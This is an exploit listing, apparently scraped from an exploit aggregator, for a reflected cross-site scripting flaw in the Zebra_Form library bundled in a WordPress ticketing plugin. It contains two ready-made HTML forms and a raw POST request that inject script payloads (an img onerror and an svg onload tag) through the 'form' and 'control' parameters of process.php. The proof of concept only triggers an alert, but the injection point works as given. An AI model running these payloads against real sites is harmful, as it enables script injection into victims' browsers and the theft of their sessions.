Exploit for Zebra_Form Library <= 2.9.8 - Reflected Cross-Site Scripting (XSS)

Name: Exploit for Zebra_Form Library <= 2.9.8 - Reflected Cross-Site Scripting (XSS)
Rating: 5 (512 reviews)

2021-02-14 | CVSS 0.3

## https://sploitus.com/exploit?id=WPEX-ID:E4B796FA-3215-43FF-A6AA-71F6E1DB25E5
Via $_GET['form']:<br/><br/>
<form action="https://example.com/wp-content/plugins/wp-ticket/assets/ext/zebraform/process.php?form=</script><img src onerror=alert(/XSS-form/)>&control=upload" method="post" enctype="multipart/form-data">
    <input type="file" name="upload"/>
    <input type="submit" name="submit" value="Send">
</form>
<br/>

Via $_GET['control']:<br/><br/>
<form action="https://example.com/wp-content/plugins/wp-ticket/assets/ext/zebraform/process.php?form=f&control=</script><svg/onload=alert(/XSS-control/)>" method="post" enctype="multipart/form-data">
    <input type="file" name="</script><svg/onload=alert(/XSS-control/)>"/>
    <input type="submit" name="submit" value="Send">
</form>

POST /wp-content/plugins/wp-ticket/assets/ext/zebraform/process.php?form=%3C/script%3E%3Cimg%20src%20onerror=alert(/XSS-form/)%3E&control=upload HTTP/1.1
Host: example.com
User-Agent: YOLO
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------77916619616724262872902741074
Content-Length: 241
Origin: null
Connection: close
Upgrade-Insecure-Requests: 1

-----------------------------77916619616724262872902741074
Content-Disposition: form-data; name="upload"; filename="a.txt"
Content-Type: text/plain

Test

-----------------------------77916619616724262872902741074--